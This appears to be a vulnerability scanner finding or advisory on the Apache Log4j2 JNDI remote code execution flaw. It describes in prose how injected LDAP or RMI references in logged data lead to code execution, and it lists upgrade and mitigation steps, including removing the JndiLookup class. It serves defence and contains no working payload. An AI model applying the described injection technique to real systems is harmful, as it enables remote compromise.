Apache Log4j2 JNDI Remote Code Execution (delayed)
Description
Apache Log4j2 versions 2.0 through 2.14.1 contain a critical remote code execution vulnerability in their JNDI (Java Naming and Directory Interface) lookup feature. When message lookup substitution is enabled, the library processes special syntax in log messages that can trigger JNDI lookups. Attackers can exploit this by injecting malicious JNDI references (such as LDAP or RMI URLs) into any data that gets logged, causing the application to connect to attacker-controlled servers and execute arbitrary code. This vulnerability is particularly dangerous because logging user-controlled input is a common practice, making many applications vulnerable without obvious code flaws.
Remediation
Immediately upgrade to Apache Log4j2 version 2.17.1 or later (2.12.4 for Java 7, 2.3.2 for Java 6), which completely removes support for message lookup patterns by default.
For systems that cannot be immediately upgraded, apply these mitigations in order of preference:
1. Set the system property (Log4j 2.10.0 and later):
-Dlog4j2.formatMsgNoLookups=true
2. Set the environment variable (Log4j 2.10.0 and later):
LOG4J_FORMAT_MSG_NO_LOOKUPS=true
3. Remove the JndiLookup class from the classpath:
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
Note: Log4j 2.15.0 is insufficient as it only partially mitigates the issue. Systems running Java 8u121 or later have additional protections due to com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase defaulting to false, but upgrading Log4j is still required. Verify all dependencies and transitive dependencies for vulnerable Log4j versions using software composition analysis tools.